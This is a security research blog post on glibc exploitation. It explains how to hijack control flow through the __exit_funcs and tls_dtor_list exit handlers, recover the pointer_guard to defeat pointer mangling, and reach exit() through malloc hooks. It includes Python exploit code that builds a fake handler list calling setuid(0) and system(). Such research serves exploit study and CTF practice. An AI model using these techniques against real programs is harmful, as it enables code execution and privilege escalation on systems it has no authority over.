Notes on abusing exit handlers, bypassing pointer mangling and glibc ptmalloc hooks
Hi,
Today we’ll talk about abusing exit handlers in order to hijack the control flow.
This research stemmed from Google Project Zero article about heap overflow NULL byte poisoning where they described using __exit_funcs or tls_dtor_list to achieve code execution. The issue I had was to find a way to resolve reliably these non-exported symbols and access them.
The exit handlers are quite interesting as it is an easy version to do ROP as they all take one parameter. Functions such as setuid(), system() or other functions needing 1 parameter can thus be easily called.
Pointer mangling is a mitigation implemented in order to thwart direct function pointer corruption. I’ll show in this post how it can be bypassed.
We’ll first analyze the code leading to the execution of these exit handlers and then show how to trigger them. There will be a lot of pasted listing ahead, these will be explained as we go.
Where is the code leading to executing these exit handlers?
About exit ()
Whenever we call libc exit(), it calls all the handlers we registered with atexit() and on_exit() before calling the _exit() syscall.
This is located in “glibc/stdlib/exit.c”.
1
2
3
4
5
void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}
exit() is just a nicely named wrapper for “__run_exit_handlers()”.
Let’s look at __run_exit_handlers():
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
/* Call all functions registered with `atexit' and `on_exit',
in the reverse of the order in which they were registered
perform stdio cleanup, and terminate program execution with STATUS. */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
bool run_list_atexit, bool run_dtors)
{
/* First, call the TLS destructors. */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();
/* We do it this way to handle recursive calls to exit () made by
the functions registered with `atexit' and `on_exit'. We call
everyone on the list and use the status value in the last
exit (). */
while (*listp != NULL)
{
struct exit_function_list *cur = *listp;
while (cur->idx > 0)
{
const struct exit_function *const f =
&cur->fns[--cur->idx];
switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);
case ef_free:
case ef_us:
break;
case ef_on:
onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
onfct (status, f->func.on.arg);
break;
case ef_at:
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
atfct ();
break;
case ef_cxa:
cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
cxafct (f->func.cxa.arg, status);
break;
}
}
*listp = cur->next;
if (*listp != NULL)
/* Don't free the last element in the chain, this is the statically
allocate element. */
free (cur);
}
if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());
_exit (status);
}
We can see that “__run_exit_handlers()” does use pointer demangling by using PTR_DEMANGLE() before dereferencing the function pointers and calling the pointed code. We will thus need to analyze how the mangling and demangling is done in order to bypass it.
We first see that it tries to call “__call_tls_dtors()”, this is interesting as this called function is used to call destructors in tls_dtor_list, we’ll come back to it.
Let’s look what a ‘struct exit_function_list’ look like.
This is located in “glibc/stdlib/exit.h”.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
enum
{
ef_free, /* `ef_free' MUST be zero! */
ef_us,
ef_on,
ef_at,
ef_cxa
};
struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};
struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};
Each handler can have 5 flavors : ef_free, ef_us, ef_on, ef_at and ef_cxa. Depending on the flavor of the exit handler, we’ll have a function pointer, argument and/or dso handle. The function list can store at most 32 handlers and a linked list is created if more is needed. idx is the total number of functions and is 1-based (not 0-based as usually).
And our PTR_MANGLE() and PTR_DEMANGLE() definitions in “sysdeps/unix/sysv/linux/x86_64/sysdep.h”.
1
2
3
4
5
6
7
8
9
10
11
12
# define PTR_MANGLE(var) asm ("xor %%fs:%c2, %0\n" \
"rol $2*" LP_SIZE "+1, %0" \
: "=r" (var) \
: "0" (var), \
"i" (offsetof (tcbhead_t, \
pointer_guard)))
# define PTR_DEMANGLE(var) asm ("ror $2*" LP_SIZE "+1, %0\n" \
"xor %%fs:%c2, %0" \
: "=r" (var) \
: "0" (var), \
"i" (offsetof (tcbhead_t, \
pointer_guard)))
Here we can see that it uses the “pointer_guard” offset in the structure “tcbhead_t” in order to access the pointer_guard in fs, this will be fs:0x30 on 64-bits machines.
The assembly of “__run_exit_handlers()”.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
pwndbg> disassemble __run_exit_handlers
Dump of assembler code for function __run_exit_handlers:
0x0000000000039f10 <+0>: push r13
0x0000000000039f12 <+2>: push r12
0x0000000000039f14 <+4>: mov r12d,edx
0x0000000000039f17 <+7>: push rbp
0x0000000000039f18 <+8>: push rbx
0x0000000000039f19 <+9>: mov rbp,rsi
0x0000000000039f1c <+12>: mov ebx,edi
0x0000000000039f1e <+14>: sub rsp,0x8
0x0000000000039f22 <+18>: call 0x3a5c0 <__gi___call_tls_dtors>
0x0000000000039f27 <+23>: mov r13,QWORD PTR [rbp+0x0]
0x0000000000039f2b <+27>: test r13,r13
0x0000000000039f2e <+30>: je 0x39f80 <__run_exit_handlers>
0x0000000000039f30 <+32>: mov rax,QWORD PTR [r13+0x8]
0x0000000000039f34 <+36>: mov rdx,rax
0x0000000000039f37 <+39>: shl rdx,0x5
0x0000000000039f3b <+43>: test rax,rax
0x0000000000039f3e <+46>: lea rcx,[r13+rdx*1-0x10]
0x0000000000039f43 <+51>: je 0x39f6f <__run_exit_handlers>
0x0000000000039f45 <+53>: sub rax,0x1
0x0000000000039f49 <+57>: mov QWORD PTR [r13+0x8],rax
0x0000000000039f4d <+61>: mov rdx,QWORD PTR [rcx]
0x0000000000039f50 <+64>: cmp rdx,0x3
0x0000000000039f54 <+68>: je 0x3a000 <__run_exit_handlers>
; ef_cxa
0x0000000000039f5a <+74>: cmp rdx,0x4
0x0000000000039f5e <+78>: je 0x39fd8 <__run_exit_handlers>
0x0000000000039f60 <+80>: cmp rdx,0x2
0x0000000000039f64 <+84>: je 0x39fb0 <__run_exit_handlers>
0x0000000000039f66 <+86>: sub rcx,0x20
0x0000000000039f6a <+90>: test rax,rax
0x0000000000039f6d <+93>: jne 0x39f45 <__run_exit_handlers>
0x0000000000039f6f <+95>: mov rax,QWORD PTR [r13+0x0]
0x0000000000039f73 <+99>: test rax,rax
0x0000000000039f76 <+102>: mov QWORD PTR [rbp+0x0],rax
0x0000000000039f7a <+106>: jne 0x3a01d <__run_exit_handlers>
0x0000000000039f80 <+112>: test r12b,r12b
0x0000000000039f83 <+115>: je 0x39fa4 <__run_exit_handlers>
0x0000000000039f85 <+117>: lea rbp,[rip+0x38594c] # 0x3bf8d8 <__elf_set___libc_atexit_element__io_cleanup__>
0x0000000000039f8c <+124>: lea r12,[rip+0x38594d] # 0x3bf8e0 <__elf_set___libc_thread_subfreeres_element_arena_thread_freeres__>
0x0000000000039f93 <+131>: cmp rbp,r12
0x0000000000039f96 <+134>: jae 0x39fa4 <__run_exit_handlers>
0x0000000000039f98 <+136>: call QWORD PTR [rbp+0x0]
0x0000000000039f9b <+139>: add rbp,0x8
0x0000000000039f9f <+143>: cmp rbp,r12
0x0000000000039fa2 <+146>: jb 0x39f98 <__run_exit_handlers>
0x0000000000039fa4 <+148>: mov edi,ebx
0x0000000000039fa6 <+150>: call 0xcbb60 <__gi__exit>
0x0000000000039fab <+155>: nop DWORD PTR [rax+rax*1+0x0]
0x0000000000039fb0 <+160>: shl rax,0x5
0x0000000000039fb4 <+164>: mov edi,ebx
0x0000000000039fb6 <+166>: add rax,r13
0x0000000000039fb9 <+169>: mov rdx,QWORD PTR [rax+0x18]
0x0000000000039fbd <+173>: mov rsi,QWORD PTR [rax+0x20]
0x0000000000039fc1 <+177>: ror rdx,0x11
0x0000000000039fc5 <+181>: xor rdx,QWORD PTR fs:0x30
0x0000000000039fce <+190>: call rdx
0x0000000000039fd0 <+192>: jmp 0x39f30 <__run_exit_handlers>
0x0000000000039fd5 <+197>: nop DWORD PTR [rax]
; ef_cxa
0x0000000000039fd8 <+200>: shl rax,0x5
0x0000000000039fdc <+204>: mov esi,ebx
0x0000000000039fde <+206>: add rax,r13
0x0000000000039fe1 <+209>: mov rdx,QWORD PTR [rax+0x18]
0x0000000000039fe5 <+213>: mov rdi,QWORD PTR [rax+0x20]
0x0000000000039fe9 <+217>: ror rdx,0x11
0x0000000000039fed <+221>: xor rdx,QWORD PTR fs:0x30
0x0000000000039ff6 <+230>: call rdx
0x0000000000039ff8 <+232>: jmp 0x39f30 <__run_exit_handlers>
0x0000000000039ffd <+237>: nop DWORD PTR [rax]
0x000000000003a000 <+240>: shl rax,0x5
0x000000000003a004 <+244>: mov rax,QWORD PTR [r13+rax*1+0x18]
0x000000000003a009 <+249>: ror rax,0x11
0x000000000003a00d <+253>: xor rax,QWORD PTR fs:0x30
0x000000000003a016 <+262>: call rax
0x000000000003a018 <+264>: jmp 0x39f30 <__run_exit_handlers>
0x000000000003a01d <+269>: mov rdi,r13
0x000000000003a020 <+272>: call 0x1f8a8
0x000000000003a025 <+277>: jmp 0x39f27 <__run_exit_handlers>
End of assembler dump.
In case you missed it, the code that really interest us is this:
1
2
3
0x0000000000039fe9 <+217>: ror rdx,0x11
0x0000000000039fed <+221>: xor rdx,QWORD PTR fs:0x30
0x0000000000039ff6 <+230>: call rdx
So what’s stored at fs:X? Let’s look at Thread Control Block.
About Thread Control Block
Like we saw in PTR_MANGLE() and PTR_DEMANGLE(), it all has to do with the structure “tcbhead_t”. This structure is what’s stored at FS, which correspond to the per thread data (TCB probably for Thread Control Block).
So at fs:0x30 we get the pointer_guard.
It’s the pointer guard as defined in “sysdeps/x86_64/nptl/tls.h” in the structure “tcbhead_t”.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
typedef struct
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv;
void *self; /* Pointer to the thread descriptor. */
int multiple_threads;
int gscope_flag;
uintptr_t sysinfo;
uintptr_t stack_guard;
uintptr_t pointer_guard;
unsigned long int vgetcpu_cache[2];
# ifndef __ASSUME_PRIVATE_FUTEX
int private_futex;
# else
int __glibc_reserved1;
# endif
int __glibc_unused1;
/* Reservation of some values for the TM ABI. */
void *__private_tm[4];
/* GCC split stack support. */
void *__private_ss;
long int __glibc_reserved2;
/* Must be kept even if it is no longer used by glibc since programs,
like AddressSanitizer, depend on the size of tcbhead_t. */
__128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));
void *__padding[8];
} tcbhead_t;
Where is that pointer_guard setted up?
It’s setted up in “csu/libc-start.c”.
1
2
3
4
5
6
7
8
/* Set up the pointer guard value. */
uintptr_t pointer_chk_guard = _dl_setup_pointer_guard (_dl_random,
stack_chk_guard);
# ifdef THREAD_SET_POINTER_GUARD
THREAD_SET_POINTER_GUARD (pointer_chk_guard);
# else
__pointer_chk_guard_local = pointer_chk_guard;
# endif
We could go look the code at “_dl_setup_pointer_guard()” but research was not done there.
We still need to determine where we can hit and overwrite these handlers. Let’s start with __exit_funcs.
About atexit() and finding __exit_funcs
The “atexit()” code is located in “cxa_atexit.c”
1
2
3
4
5
6
7
8
9
/* Register a function to be called by exit or when a shared library
is unloaded. This function is only called from code generated by
the C++ compiler. */
int
__cxa_atexit (void (*func) (void *), void *arg, void *d)
{
return __internal_atexit (func, arg, d, &__exit_funcs);
}
ibc_hidden_def (__cxa_atexit)
And the corresponding assembly.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
pwndbg> disassemble __cxa_atexit
Dump of assembler code for function __GI___cxa_atexit:
0x000000000003a280 <+0>: push r12
0x000000000003a282 <+2>: push rbp
0x000000000003a283 <+3>: mov r12,rsi
0x000000000003a286 <+6>: push rbx
0x000000000003a287 <+7>: mov rbx,rdi
0x000000000003a28a <+10>: lea rdi,[rip+0x389367] # 0x3c35f8 <__exit_funcs>
0x000000000003a291 <+17>: mov rbp,rdx
0x000000000003a294 <+20>: call 0x3a0a0 <__new_exitfn>
0x000000000003a299 <+25>: test rax,rax
0x000000000003a29c <+28>: je 0x3a2c8 <__gi___cxa_atexit>
0x000000000003a29e <+30>: mov rdi,rbx
0x000000000003a2a1 <+33>: mov QWORD PTR [rax+0x10],r12
0x000000000003a2a5 <+37>: mov QWORD PTR [rax+0x18],rbp
0x000000000003a2a9 <+41>: xor rdi,QWORD PTR fs:0x30
0x000000000003a2b2 <+50>: rol rdi,0x11
0x000000000003a2b6 <+54>: mov QWORD PTR [rax+0x8],rdi
0x000000000003a2ba <+58>: mov QWORD PTR [rax],0x4
0x000000000003a2c1 <+65>: xor eax,eax
0x000000000003a2c3 <+67>: pop rbx
0x000000000003a2c4 <+68>: pop rbp
0x000000000003a2c5 <+69>: pop r12
0x000000000003a2c7 <+71>: ret
0x000000000003a2c8 <+72>: mov eax,0xffffffff
0x000000000003a2cd <+77>: jmp 0x3a2c3 <__gi___cxa_atexit>
End of assembler dump.</__gi___cxa_atexit></__gi___cxa_atexit></__new_exitfn></__exit_funcs>
What’s interesting is “__exit_funcs” being used. “__exit_funcs” is an un-exported function but we can resolve it by disassembling that piece of assembly with capstone and retrieving the needed VA. “__cxa_atexit()” is an exported symbol so we can retrieve the VA easily using pwntools.elf.ELF. You can see at VA 0x3a28a that it calculates the address of “__exit_funcs”.
Here is the code I wrote to do just that:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# get __exit_funcs addr
def get_exit_funcs (code, off = 0):
md = Cs (CS_ARCH_X86, CS_MODE_64)
md.detail = True
# look for ptr offset
ptr_exit_funcs = None
for inst in md.disasm (code[off:], off):
if inst.mnemonic != 'lea':
continue
for operand in inst.operands:
if operand.type == x86.X86_OP_MEM:
if inst.reg_name (operand.value.mem.base) != 'rip':
continue
ptr_exit_funcs = inst.address + inst.size + operand.value.mem.disp
break
if ptr_exit_funcs:
break
if ptr_exit_funcs is None:
return None
return ptr_exit_funcs
I’ll show at the end of the article how to use it to bypass pointer mangling. Let’s first have a look at tls_dtor_list.
About __call_tls_dtors() and finding tls_dtor_list
I was talking about “__call_tls_dtors()” being an interesting piece of code to look at.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/* Call the destructors. This is called either when a thread returns from the
initial function or when the process exits via the exit function. */
void
__call_tls_dtors (void)
{
while (tls_dtor_list)
{
struct dtor_list *cur = tls_dtor_list;
dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (func);
#endif
tls_dtor_list = tls_dtor_list->next;
func (cur->obj);
/* Ensure that the MAP dereference happens before
l_tls_dtor_count decrement. That way, we protect this access from a
potential DSO unload in _dl_close_worker, which happens when
l_tls_dtor_count is 0. See CONCURRENCY NOTES for more detail. */
atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
free (cur);
}
}
The part that really interest us is about tls_dtor_list being used.
The corresponding assembly.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
pwndbg> disassemble __GI___call_tls_dtors
Dump of assembler code for function __GI___call_tls_dtors:
0x000000000003a5c0 <+0>: push rbp
0x000000000003a5c1 <+1>: push rbx
0x000000000003a5c2 <+2>: sub rsp,0x8
0x000000000003a5c6 <+6>: mov rbp,QWORD PTR [rip+0x3887b3] # 0x3c2d80
0x000000000003a5cd <+13>: mov rbx,QWORD PTR fs:[rbp+0x0]
0x000000000003a5d2 <+18>: test rbx,rbx
0x000000000003a5d5 <+21>: je 0x3a61e <__gi___call_tls_dtors>
0x000000000003a5d7 <+23>: nop WORD PTR [rax+rax*1+0x0]
0x000000000003a5e0 <+32>: mov rdx,QWORD PTR [rbx+0x18]
0x000000000003a5e4 <+36>: mov rax,QWORD PTR [rbx]
0x000000000003a5e7 <+39>: mov rdi,QWORD PTR [rbx+0x8]
0x000000000003a5eb <+43>: ror rax,0x11
0x000000000003a5ef <+47>: xor rax,QWORD PTR fs:0x30
0x000000000003a5f8 <+56>: mov QWORD PTR fs:[rbp+0x0],rdx
0x000000000003a5fd <+61>: call rax
0x000000000003a5ff <+63>: mov rax,QWORD PTR [rbx+0x10]
0x000000000003a603 <+67>: lock sub QWORD PTR [rax+0x450],0x1
0x000000000003a60c <+76>: mov rdi,rbx
0x000000000003a60f <+79>: call 0x1f8a8
0x000000000003a614 <+84>: mov rbx,QWORD PTR fs:[rbp+0x0]
0x000000000003a619 <+89>: test rbx,rbx
0x000000000003a61c <+92>: jne 0x3a5e0 <__gi___call_tls_dtors>
0x000000000003a61e <+94>: add rsp,0x8
0x000000000003a622 <+98>: pop rbx
0x000000000003a623 <+99>: pop rbp
0x000000000003a624 <+100>: ret
End of assembler dump.</__gi___call_tls_dtors></__gi___call_tls_dtors>
You can see at VA 0x3a5c6 that it dereferences the pointer to tls_dtor_list. So we can disassemble that function and find that offset using capstone. “__call_tls_dtors” is exported so the address can be easily parsed out using pwntools.elf.ELF.
I didn’t write code for it but the idea is the same as for __exit_funcs, this is left as an exercise to the reader.
Bypassing pointer mangling
While playing with a binary challenge, I happened to see that _dl_fini() is often registered in the __exit_funcs array, so we can recalculate the pointer_guard value and thus bypass pointer mangling.
The issue with “_dl_fini()” is that it seems to be an un-exported symbol. I’ve found the address while digging in gdb. An elf parser probably has to be written to find “_dl_fini()” address.
A vulnerability that allows you to leak an encoded pointer in __exit_funcs is also necessary. Here we use _dl_fini encoded pointer.
The formula to compute the pointer_guard assuming that “_dl_fini()” is used is as follow:
1
ptr_guard = ror (ptr_encoded, 0x11, 64) ^ _dl_fini
Here the code you’ve been waiting for. We re-use “get_exit_funcs()” that was showed earlier.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
elf = ELF (libc_filename)
# get libc data
content = ''
with open (libc_filename) as fp:
content = fp.read ()
# get our exit_funcs address
off_cxa_atexit = elf.symbols['__cxa_atexit']
ptr_exit_funcs = libc_base + get_exit_funcs (content, off_cxa_atexit)
off_exit_funcs = ptr_exit_funcs - start_data
__exit_funcs = struct.unpack ('<Q', libc_data[off_exit_funcs:off_exit_funcs + 8])[0]
# our encoded pointer location
off_ptr_encoded = (__exit_funcs - start_data) + 24
ptr_encoded = struct.unpack ('<Q', libc_data[off_ptr_encoded:off_ptr_encoded + 8])[0]
# this is used to encode pointers
ptr_guard = ror (ptr_encoded, 0x11, 64) ^ _dl_fini
print '\n[+] Leak __exit_funcs'
print 'start_data : 0x%016x' % start_data
print 'ptr_exit_funcs : 0x%016x' % ptr_exit_funcs
print 'exit_funcs : 0x%016x' % __exit_funcs
print 'off_ptr_encoded : 0x%016x' % off_ptr_encoded
print 'ptr_encoded : 0x%016x' % ptr_encoded
print 'ptr_guard : 0x%016x' % ptr_guard
Now that we got the pointer_guard, what do we do?
We craft a fake __exit_funcs and corrupt the original __exit_funcs.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
class CxaFunc (object):
def __init__ (self, func, arg, ptr_guard):
self.func = func
self.arg = arg
self.ptr_guard = ptr_guard
def __str__ (self):
# flavor = 4 (ef_cxa) + func + arg + NULL (dso handle)
if self.ptr_guard:
encoded = rol (self.func ^ self.ptr_guard, 0x11, 64)
else:
encoded = self.func
print 'func : 0x%016x | encoded : 0x%016x | arg : 0x%016x' % (self.func, encoded, self.arg)
# ef_cxa == 4 | encoded function pointer | argument | dso handle set to NULL
data = struct.pack ('<Q', 4) + struct.pack ('<Q', encoded) + struct.pack ('<Q', self.arg) + struct.pack ('<Q', 0)
return data
class ExitHandlers (object):
def __init__ (self, ptr_guard):
self.handlers = list ()
self.ptr_guard = ptr_guard
def append (self, func, arg):
cxafunc = CxaFunc (func, arg, self.ptr_guard)
self.handlers.append (cxafunc)
def __str__ (self):
fake_exit_funcs = ''
# next = NULL
fake_exit_funcs += struct.pack ('<Q', 0)
# idx = number of handlers
print 'Packing %d handlers' % len (self.handlers)
fake_exit_funcs += struct.pack ('<Q', len (self.handlers))
for cxafunc in self.handlers:
fake_exit_funcs += str (cxafunc)
return fake_exit_funcs
# build our exit_funcs functions list
fake_exit_funcs = ExitHandlers (ptr_guard)
# setuid
fake_exit_funcs.append (func_setuid, 0)
# system and get cmd
for heap_addr in heap_addrs:
fake_exit_funcs.append (func_system, heap_addr)
fake_exit_funcs = str (fake_exit_funcs)
Given you’ve recalculated the proper pointer_guard … pointer mangling is bypassed.
Other (untested) ideas to get the pointer_guard?
There probably is another way to get that pointer_guard given you’ve got an arbitrary infoleak. This may be possible through a pointer corruption or a UAF or Type Confusion or something else. If the attacker somehow manage to find where ‘struct tcbhead’ is located in memory, he may be able to just read the value out of it.
Last idea is probably far fetched but let’s look at it. Let’s say you got an oracle : crash or not crash and that your process is respawned through a fork(). You could probably use techniques similar as those used for blind rop to guess the pointer guard. More research can be done there but we don’t need it for now.
About glibc ptmalloc hooks
It may come a time where you somehow can’t manage to exit a program running as it may run in a infinite loop for example.
In order to use our previous technique, the process has to call the libc exit() function. This happens when the process prepare to exit.
We may be able to trigger that function before reaching the end of the program by using glibc ptmalloc hooks. In each glibc ptmalloc functions, there is a function pointer that is called given it’s not NULL. By over-writing one of these hooks with glibc exit() function and triggering the corresponding malloc(), free() or realloc() call, we’ll trigger the execution of our payload written in __exit_funcs.
These functions hook are all exported symbols that you can easily get with pwntools.elf.ELF : __free_hook, __malloc_hook, __realloc_hook and __memalign_hook.
Conclusion
Full mitigations bypass is still possible nowadays on the latest Linux distribution given the proper vulnerabilities and binary. Every technique is applicable on a case-by-case basis. Pointer mangling was implemented in order to make destructors corruption exploitation harder, but as can be seen it’s not impossible.
This technique is particularly useful when you don’t know where the stack is and you have full RELRO activated. It allows you to do an easy version of ROP.
Cheers,
m_101
References
- The poisoned NULL byte, 2014 edition : https://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
- Pointer Encryption : https://sourceware.org/glibc/wiki/PointerEncryption